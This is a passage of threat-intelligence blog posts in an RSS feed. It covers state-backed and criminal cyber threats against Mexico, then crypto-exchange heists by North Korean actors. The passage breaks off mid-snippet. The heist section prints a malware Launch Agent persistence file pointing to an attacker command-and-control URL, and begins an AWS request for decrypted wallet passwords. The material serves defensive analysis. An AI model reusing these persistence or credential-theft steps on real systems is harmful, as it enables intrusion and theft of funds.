Since 2020, cyber espionage groups from more than 10 countries have targeted users in Mexico; however, more than 77% of government-backed phishing activity is concentrated among groups from the People's Republic of China (PRC), North Korea, and Russia.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/threats-targeting-mexico-fig1.max-1000x1000.jpg" alt="Government-backed phishing activity targeting Mexico"> <figcaption class="article-image__caption "><p data-block-key="5ml7z">Figure 1: Government-backed phishing activity targeting Mexico, January 2020 – August 2024</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The following cases highlight recent and historical instances in which cyber espionage actors have targeted users and organizations in Mexico. 
It should be noted that these campaigns describe targeting and do not indicate successful compromise or exploitation.</span></p> <h3><span style="vertical-align: baseline;">PRC Cyber Espionage Activity Targeting Mexico</span></h3> <p><span style="vertical-align: baseline;">Since 2020, we have observed activity from seven cyber espionage groups with links to the PRC targeting users in Mexico, accounting for a third of government-backed phishing activity in the country.</span></p> <p><span style="vertical-align: baseline;">This volume of PRC cyber espionage is similar to activity in other regions where Chinese government investment has been focused, such as countries within </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/apt40-examining-a-china-nexus-espionage-actor"><span style="text-decoration: underline; vertical-align: baseline;">China's Belt and Road Initiative</span></a><span style="vertical-align: baseline;">. In addition to activity targeting Gmail users, PRC-backed groups have targeted Mexican government agencies, higher education institutions, and news organizations. </span></p> <h3><span style="vertical-align: baseline;">North Korean Government-Backed Groups Targeting Mexico</span></h3> <p><span style="vertical-align: baseline;">Since 2020, North Korean cyber actors have accounted for approximately 18% of government-backed phishing activity targeting Mexico. 
Similar to their targeting interests in other regions, cryptocurrency and financial technology firms have been a particular focus.</span></p> <p><span style="vertical-align: baseline;">One of the emerging trends we are witnessing globally from North Korea is the insider threat posed by North Korean nationals </span><a href="https://www.ic3.gov/Media/Y2023/PSA231018" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">gaining employment surreptitiously</span></a><span style="vertical-align: baseline;"> at corporations to conduct work in various IT roles. We note the potential for this threat to present a future risk to Mexican enterprises given historical activity by North Korean threat actors in Mexico and the challenges associated with the expansive problem of North Korean actors attempting to gain employment in other countries. </span></p> <h3><span style="vertical-align: baseline;">Russian Cyber Espionage Activity Targeting Mexico</span></h3> <p><span style="vertical-align: baseline;">Russian cyber espionage groups have targeted users in Mexico regularly for several years; however, since the start of Russia's war in Ukraine, Russian activity targeting Mexico has scaled back considerably—likely an indication of Russia's efforts to focus resources on Ukrainian and North Atlantic Treaty Organization (NATO) targets in the context of the Russia-Ukraine war. Of the four Russia-backed groups observed targeting Mexico, over 95% of the related phishing activity comes from one group, APT28 (aka </span><a href="https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">FROZENLAKE</span></a><span style="vertical-align: baseline;">). 
</span></p> <p><span style="vertical-align: baseline;">Since 2020, Russian cyber actors have accounted for approximately one-fifth of government-backed phishing activity targeting Mexico. However, in 2023 and 2024, Russian cyber actors only account for less than 1% of government-backed phishing activity targeting Mexico.</span></p> <h3><span style="vertical-align: baseline;">Commercial Surveillance Vendors </span></h3> <p><span style="vertical-align: baseline;">Spyware is typically used to monitor and collect data from high-risk users like journalists, human rights defenders, dissidents, and opposition-party politicians. These capabilities have increased demand for spyware technology, creating a lucrative industry that sells governments and nefarious actors the ability to exploit vulnerabilities in consumer devices. Google offers </span><a href="https://blog.google/technology/safety-security/online-safety-resources/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">a range of tools</span></a><span style="vertical-align: baseline;"> to help protect high-risk users from online threats.</span></p> <p><span style="vertical-align: baseline;">Over the past several years, </span><a href="https://citizenlab.ca/2017/06/reckless-exploit-mexico-nso/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">open</span></a><span style="vertical-align: baseline;"> </span><a href="https://citizenlab.ca/2017/02/bittersweet-nso-mexico-spyware/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">sources</span></a><span style="vertical-align: baseline;"> have </span><a href="https://forbiddenstories.org/about-the-pegasus-project/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">reported</span></a><span style="vertical-align: baseline;"> multiple cases involving the use of spyware to 
target many sectors of Mexican civil society, including journalists, activists, government officials, and their families in Mexico. TAG has previously </span><a href="https://blog.google/threat-analysis-group/commercial-surveillance-vendors-google-tag-report/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">highlighted the negative outcomes of commercial spyware tools</span></a><span style="vertical-align: baseline;">, including the proliferation of sophisticated cyber threat capabilities to new operators and sponsors, the increasing rates of zero-day vulnerability discovery and exploitation, and harm to targets of these tools. Though the use of spyware typically only affects a small number of human targets at a time, its wider impact ripples across society by contributing to growing threats to free speech and the free press and the integrity of democratic processes worldwide. TAG continues to observe evidence of several commercial surveillance vendors operating in Mexico. As recently as April 2024, TAG observed spyware being used in Mexico with Mexican news-themed lures.</span></p> <h2><span style="vertical-align: baseline;">Insights on Cyber Crime Targeting Users and Enterprises in Mexico</span></h2> <p><span style="vertical-align: baseline;">Cyber crime represents a common, moderate-impact threat to Mexico. Notably, we have observed a variety of operations, including ransomware and extortion, targeting of banking credentials, cryptomining, and threat actors offering compromised access and/or credentials for sale. TAG continues to detect and disrupt multiple financially motivated groups targeting users and organizations in Mexico. Of these groups, three of the top four most frequently observed groups in the past year have been initial access brokers for extortion groups. 
Mandiant observed evidence of threat actors using a variety of initial access vectors, including phishing, malvertising, infected USB drives, and password spraying. This initial access subsequently supported threat activity including ransomware and extortion operations, cryptomining, and threat actors offering compromised access and/or credentials for sale.</span></p> <p><span style="vertical-align: baseline;">Like other countries in the region, Mexico is affected by threat activity from actors primarily active in Latin America as well as operations with global reach. A significant number of observed campaigns focus on stealing credentials for banking or other financial accounts, including use of banking trojans such as METAMORFO aka "Horabot," BBtok, and JanelaRAT. Many threat actors in the Latin American underground appear to focus on simpler operations in which they can quickly and easily generate profits, such as payment card theft and fraud.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/threats-targeting-mexico-fig2.max-1000x1000.png" alt="Financially motivated actors most frequently observed in Mexico"> <figcaption class="article-image__caption "><p data-block-key="3122z">Figure 2: Financially motivated actors most frequently observed in Mexico, Q3 2022 – Q2 2024</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Extortion's Impact on Mexico</span></h3> <p><span style="vertical-align: baseline;">Extortion operations, including ransomware, multifaceted ransomware, and extortion, continue to affect organizations across regions and industries, including Mexico, leading to significant financial losses and business disruption. 
For detailed guidance on defensive strategies for ransomware, please see our blog post: </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/ransomware-protection-and-containment-strategies"><span style="text-decoration: underline; vertical-align: baseline;">Ransomware Protection and Containment Strategies: Practical Guidance for Hardening and Protecting Infrastructure, Identities, and Endpoints</span></a><span style="vertical-align: baseline;"> and the accompanying </span><a href="https://services.google.com/fh/files/misc/ransomware-protection-and-containment-strategies-report-en.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">white paper</span></a><span style="vertical-align: baseline;">. </span></p> <p><span style="vertical-align: baseline;">Mandiant tracks multiple data leak sites (DLSs) dedicated to releasing victim data following ransomware and/or extortion incidents in which victims refuse to pay a ransom demand. From January 2023 to July 2024, Mexico was surpassed only by Brazil as the Latin American and Caribbean country most affected by ransomware and extortion operations, based on counts of DLS listings, though the global distribution of extortion activity as indicated by DLS listings remains heavily skewed towards the U.S., Canada, and Western Europe. The most frequently impacted sectors in Mexico include manufacturing, technology, financial services, and government. 
DLSs that most often listed Mexican organizations include LockBit, ALPHV, and 8BASE.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/threats-targeting-mexico-fig3.max-1000x1000.png" alt="Data leak listings for Mexican organizations by industry"> <figcaption class="article-image__caption "><p data-block-key="in0sg">Figure 3: Data leak listings for Mexican organizations by industry</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Impersonating Official Government Services to Distribute Malware </span></h3> <p><span style="vertical-align: baseline;">Malware distribution campaigns targeting users in Mexico frequently use tax- and finance-themed lures to convince recipients to open malicious links or files. Throughout 2023 and into 2024, Mandiant observed UNC4984 activity distributing either malicious browser extensions or the SIMPLELOADER downloader using multiple distribution vectors, including using email lures for malware distribution. 
The malicious websites leveraged in these campaigns often masquerade as tax- or finance-related Chilean or Mexican government websites, and the malicious browser extensions specifically target Mexican banking institutions.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/threats-targeting-mexico-fig4.max-1000x1000.png" alt="UNC4984 website spoofing the Mexican Tax Administration Service (SAT) prompting users to download a malicious browser extension"> <figcaption class="article-image__caption "><p data-block-key="in0sg">Figure 4: UNC4984 website spoofing the Mexican Tax Administration Service (SAT) prompting users to download a malicious browser extension</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Another financially motivated group, tracked as UNC5176, uses emails and malicious advertisement (aka "malvertising") campaigns to compromise users from various countries, including Brazil, Mexico, Chile, and Spain. Mandiant observed multiple malicious email campaigns delivering the URSA (aka Mispadu) backdoor to Latin American organizations in multiple industries, including a December 2023 UNC5176 campaign spoofing Mexico's state-owned electric utility, the Comisión Federal de Electricidad. In April 2024, an UNC5176 phishing campaign distributed URSA to organizations primarily located in Latin America using malicious PDF attachments containing an embedded link to a ZIP archive. 
In some incidents, the ZIP archives were hosted on and retrieved from legitimate file-hosting services such as S3 buckets, Azure, GitHub, and Dropbox.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/threats-targeting-mexico-fig5.max-1000x1000.png" alt="Screenshot of phishing email"> <figcaption class="article-image__caption "><p data-block-key="in0sg">Figure 5: Screenshot of phishing email</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%;"> <tbody> <tr> <td style="width: 98.1839%;"> <p><em><strong><span style="vertical-align: baseline;">Using Threat Intelligence to Protect Users and Customers</span></strong></em></p> <p>Google uses the results of our research to improve the safety and security of our products, making them secure by default. 
Chrome OS has built-in, proactive security measures to protect from ransomware attacks, and there have been <a href="https://cloud.google.com/blog/products/chrome-enterprise/chrome-os-ransomware?e=48754805"><span style="text-decoration: underline; vertical-align: baseline;">no reported ransomware attacks ever</span></a><span style="vertical-align: baseline;"> on any Chrome OS device. Google security teams continuously monitor for new threat activity, and all identified websites and domains are added to </span><a href="https://safebrowsing.google.com/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Safe Browsing</span></a><span style="vertical-align: baseline;"> to protect users from further exploitation. We also deploy and constantly update Android detections to protect users' devices and prevent malicious actors from publishing malware to the Google Play Store. We send targeted Gmail and Workspace users </span><a href="https://support.google.com/a/answer/9007870?hl=en" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">government-backed attacker alerts</span></a><span style="vertical-align: baseline;">, notifying them of the activity and highly encouraging device updates and the use of </span><a href="https://security.googleblog.com/2021/06/new-protections-for-enhanced-safe.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Enhanced Safe Browsing</span></a><span style="vertical-align: baseline;"> for Chrome. 
Additionally, Google Cloud customers can access insight into these threats through our </span><a href="https://cloud.google.com/blog/products/identity-security/introducing-google-threat-intelligence-actionable-threat-intelligence-at-google-scale-at-rsa"><span style="text-decoration: underline; vertical-align: baseline;">Google Threat Intelligence</span></a><span style="vertical-align: baseline;"> product announced earlier this year.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <h2><span style="vertical-align: baseline;">Conclusion </span></h2> <p><span style="vertical-align: baseline;">Mexico will remain an attractive target for threat actors driven by diverse motivations. Global cyber espionage actors from the PRC, North Korea, and Russia as well as multinational cyber criminals pose longstanding threats. To effectively safeguard Mexican enterprises and users, it is important to understand this unique interplay of threats and adopt a proactive approach to cybersecurity.</span></p> <p><span style="vertical-align: baseline;">We hope the analysis and research here helps to inform defenders in Mexico, providing fresh insights for collective defense. 
At Google, we are committed to supporting the safety and security of online users everywhere and will continue to take action to disrupt malicious activity to protect our users and enterprise customers and help make the internet safe for all.</span></p></div></description><pubDate>Tue, 10 Sep 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-targeting-mexico/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Insights on Cyber Threats Targeting Users and Enterprises in Mexico</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-targeting-mexico/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Threat Analysis Group </name><title></title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>DeFied Expectations — Examining Web3 Heists</title><link>https://cloud.google.com/blog/topics/threat-intelligence/examining-web3-heists/</link><description><div class="block-paragraph_advanced"><p>Written by: Robert Wallace, Blas Kojusner, Joseph Dobson</p> <hr/></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Where money goes, crime follows. The rapid growth of Web3 has presented new opportunities for threat actors, especially in decentralized finance (</span><a href="https://www.coinbase.com/learn/crypto-basics/what-is-defi" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">DeFi</span></a><span style="vertical-align: baseline;">), where the heists are larger and more numerous than anything seen in the traditional finance sector. Mandiant has a long history of investigating bank heists. 
In 2016, Mandiant investigated the world's </span><a href="https://www.nytimes.com/interactive/2018/05/03/magazine/money-issue-bangladesh-billion-dollar-bank-heist.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">largest bank heist</span></a><span style="vertical-align: baseline;"> that occurred at the Bank of Bangladesh and resulted in the theft of $81 million by North Korea's APT38. While the group's operations were quite innovative and made for an entertaining </span><a href="https://www.bbc.co.uk/programmes/w13xtvg9/episodes/downloads" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">10-episode podcast by the BBC</span></a><span style="vertical-align: baseline;">, it pales in comparison to Web3 heists. In 2022, the largest DeFi heist occurred on Sky Mavis' Ronin Blockchain, which resulted in the theft of over </span><a href="https://www.ft.com/content/dec696d4-fd51-4cce-bbd9-1dee911eb4cd" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">$600 million by North Korean threat actors</span></a><span style="vertical-align: baseline;">. While North Korea is arguably the world's leading </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/north-korea-cyber-structure-alignment-2023?e=48754805"><span style="text-decoration: underline; vertical-align: baseline;">cyber criminal enterprise</span></a><span style="vertical-align: baseline;">, they are not the only player. 
Since 2020, there have been hundreds of Web3 heists reported, which have resulted in over $12 billion in stolen digital assets.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/web3-heists-fig0.max-1000x1000.png" alt="Chainalysis 2024 Crypto Crime Report"> <figcaption class="article-image__caption "><p data-block-key="7iyiz">Source: Chainalysis 2024 Crypto Crime Report</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">While </span><a href="https://twitter.com/The_PeopleDAO/status/1634518915668668416?s=20" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">social engineering</span></a><span style="vertical-align: baseline;">, </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/solana-cryptocurrency-stolen-clinksink-drainer-campaigns/?e=48754805"><span style="text-decoration: underline; vertical-align: baseline;">crypto drainers</span></a><span style="vertical-align: baseline;">, </span><a href="https://rekt.news/zkasino-rekt/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">rug pulls</span></a><span style="vertical-align: baseline;"> (scams), and </span><a href="https://rekt.news/ftx-yikes/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">frauds</span></a><span style="vertical-align: baseline;"> abound, the most impactful Web3 incidents typically involve theft of crypto wallet keys from organizations (e.g., crypto exchanges), smart contract exploits, and occasionally </span><a href="https://web.archive.org/web/20211229074029/https://badger.com/technical-post-mortem" rel="noopener" 
target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">web frontend attacks that divert user funds</span></a><span style="vertical-align: baseline;">.</span></p> <h2><span style="vertical-align: baseline;">Crypto Exchange Heists</span></h2> <p><span style="vertical-align: baseline;">Crypto exchanges are valuable targets for sophisticated cyber criminals. One of the earliest and perhaps most notable exchange heists occurred in February 2014 when </span><a href="https://cointelegraph.com/learn/the-mt-gox-bitcoin-heist%5C" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Mt. Gox lost approximately $350 million</span></a><span style="vertical-align: baseline;"> worth of bitcoin (BTC). Since that time, there have been numerous attacks on exchanges. More recently, in May 2024, the </span><span style="vertical-align: baseline;">Japanese crypto exchange DMM Bitcoin had over </span><a href="https://www.coindesk.com/business/2024/06/05/crypto-exchange-dmm-bitcoin-to-raise-320m-to-pay-back-hack-victims/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">$300 million stolen</span></a><span style="vertical-align: baseline;">.</span></p> <p><span style="vertical-align: baseline;">Crypto exchange heists typically involve a series of events that map to the </span><a href="https://www.mandiant.com/resources/insights/targeted-attack-lifecycle" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Targeted Attack Lifecycle</span></a><span style="vertical-align: baseline;">. Recent findings from Mandiant heist investigations have identified social engineering of developers via fake job recruiting with coding tests as a common initial infection vector. 
The following screenshots (Figure 1) are from a recent heist investigation where an engineer was contacted about a fake job opportunity via LinkedIn by a DPRK threat actor. After an initial chat conversation, the attacker sent a ZIP file that contained </span><span style="vertical-align: baseline;">COVERTCATCH</span><span style="vertical-align: baseline;"> malware disguised as a </span><a href="https://blogs.jpcert.or.jp/en/2023/07/dangerouspassword_dev.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Python coding challenge</span></a><span style="vertical-align: baseline;">, which compromised the user’s macOS system by downloading a second-stage malware that persisted via Launch Agents and Launch Daemons.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/web3-heists-fig1a.max-1000x1000.png" alt="Fake job opportunity"> <figcaption class="article-image__caption "><p data-block-key="o9llw">Figure 1: Fake job opportunity</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">DPRK social engineering efforts have also targeted finance personnel. Recently, Mandiant observed a similar recruiting theme that delivered a malicious PDF disguised as a job description for “VP of Finance and Operations” at a prominent crypto exchange. The malicious PDF dropped a second-stage malware known as </span><span style="vertical-align: baseline;">RUSTBUCKET</span><span style="vertical-align: baseline;">, which is a backdoor written in Rust that supports file execution. 
The backdoor collects basic system information, communicates to a URL provided via the command-line, and in this instance persisted, via a Launch Agent disguised as “Safari Update” with a <span style="vertical-align: baseline;">command-and-control (C2 or C&amp;C)</span> domain </span><code style="vertical-align: baseline;">autoserverupdate[.]line[.]pm</code><span style="vertical-align: baseline;">.</span></p></div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> 
<div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%; margin-left: auto; margin-right: auto;"> <tbody> <tr> <td style="width: 98.1839%;"> <p><code style="vertical-align: baseline;">&lt;?xml version="1.0" encoding="UTF-8"?&gt;<br/></code><code style="vertical-align: baseline;"> &lt;!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" <br/>"http://www.apple.com/DTDs/PropertyList-1.0.dtd"&gt;<br/></code><code style="vertical-align: baseline;"> &lt;plist version="1.0"&gt;<br/></code><code style="vertical-align: baseline;"> &lt;dict&gt;<br/></code><code style="vertical-align: baseline;"> &lt;key&gt;Label&lt;/key&gt;<br/></code><code style="vertical-align: baseline;"> &lt;string&gt;</code><code style="vertical-align: baseline;"><span style="background-color: #f9ab00;">com.apple.safariupdate</span></code><code style="vertical-align: baseline;">&lt;/string&gt;<br/></code><code style="vertical-align: baseline;"> &lt;key&gt;RunAtLoad&lt;/key&gt;<br/></code><code style="vertical-align: baseline;"> &lt;true/&gt;<br/></code><code style="vertical-align: baseline;"> &lt;key&gt;LaunchOnlyOnce&lt;/key&gt;<br/></code><code style="vertical-align: baseline;"> 
&lt;true/&gt;<br/></code><code style="vertical-align: baseline;"> &lt;key&gt;KeepAlive&lt;/key&gt;<br/></code><code style="vertical-align: baseline;"> &lt;true/&gt;<br/></code><code style="vertical-align: baseline;"> &lt;key&gt;ProgramArguments&lt;/key&gt;<br/></code><code style="vertical-align: baseline;"> &lt;array&gt;<br/></code><code style="vertical-align: baseline;"> &lt;string&gt;</code><code style="vertical-align: baseline;"><span style="background-color: #f9ab00;">/Users/REDACTED/Library/Application Support/Safari Update</span></code><code style="vertical-align: baseline;">&lt;/string&gt;<br/></code></p> <p><code style="vertical-align: baseline;">&lt;string&gt;</code><code style="vertical-align: baseline;"><span style="background-color: #f9ab00;">https://autoserverupdate.line[.]pm/qp5FV6ilCJf</span><br/><span style="background-color: #f9ab00;">/Q5wWzIY5%2BSEE07MzxS/TMbSBM7BiR/DIUDMurOYs/xoG5A%3D%3D</span></code><code style="vertical-align: baseline;">&lt;/string&gt;<br/></code><code style="vertical-align: baseline;"> &lt;/array&gt;<br/></code><code style="vertical-align: baseline;"> &lt;/dict&gt;<br/></code><code style="vertical-align: baseline;"> &lt;/plist&gt;</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div style="color: #5f6368; overflow: auto hidden; width: 100%; text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 2: <span style="vertical-align: baseline;">Launch Agent PLIST file used for persistence of RUSTBUCKET malware</span></span></div> </div> </div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">DPRK threat actors do not rely solely on social engineering when targeting Web3 organizations. 
They have also been observed conducting supply chain attacks to establish an initial foothold such as the attacks on </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/north-korea-supply-chain"><span style="text-decoration: underline; vertical-align: baseline;">JumpCloud</span></a><span style="vertical-align: baseline;"> and </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/3cx-software-supply-chain-compromise"><span style="text-decoration: underline; vertical-align: baseline;">3CX</span><span style="vertical-align: baseline;"> in 2023 which targeted their downstream customers that provide cryptocurrency services</span></a><span style="vertical-align: baseline;">. Once a foothold is established via malware, the attackers pivot to password managers to steal credentials, perform internal reconnaissance via code repos and documentation, and pivot into the cloud hosting environment to reveal hot wallet keys and eventually drain funds. </span></p> <p><span style="vertical-align: baseline;">The following snippet shows example decrypted </span><a href="https://docs.aws.amazon.com/systems-manager/latest/userguide/systems-manager-parameter-store.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">AWS EC2 SSM Parameters</span></a><span style="vertical-align: baseline;"> identified in </span><a href="https://docs.aws.amazon.com/systems-manager/latest/userguide/parameter-store-logging-auditing.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">AWS CloudTrail</span></a><span style="vertical-align: baseline;"> logs from a heist investigation. These decrypted SSM Parameters included the private keys, usernames, and passwords for an exchange’s production cryptocurrency wallets. 
Approximately one hour later the wallets were drained resulting in a loss of over $100 million.</span></p></div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%; margin-left: auto; margin-right: auto;"> <tbody> <tr> <td style="width: 98.1839%;"> <p><code style="vertical-align: baseline;">{"name":"/prod/wallets/wallets-password","withDecryption":true}<br/></code><code style="vertical-align: 
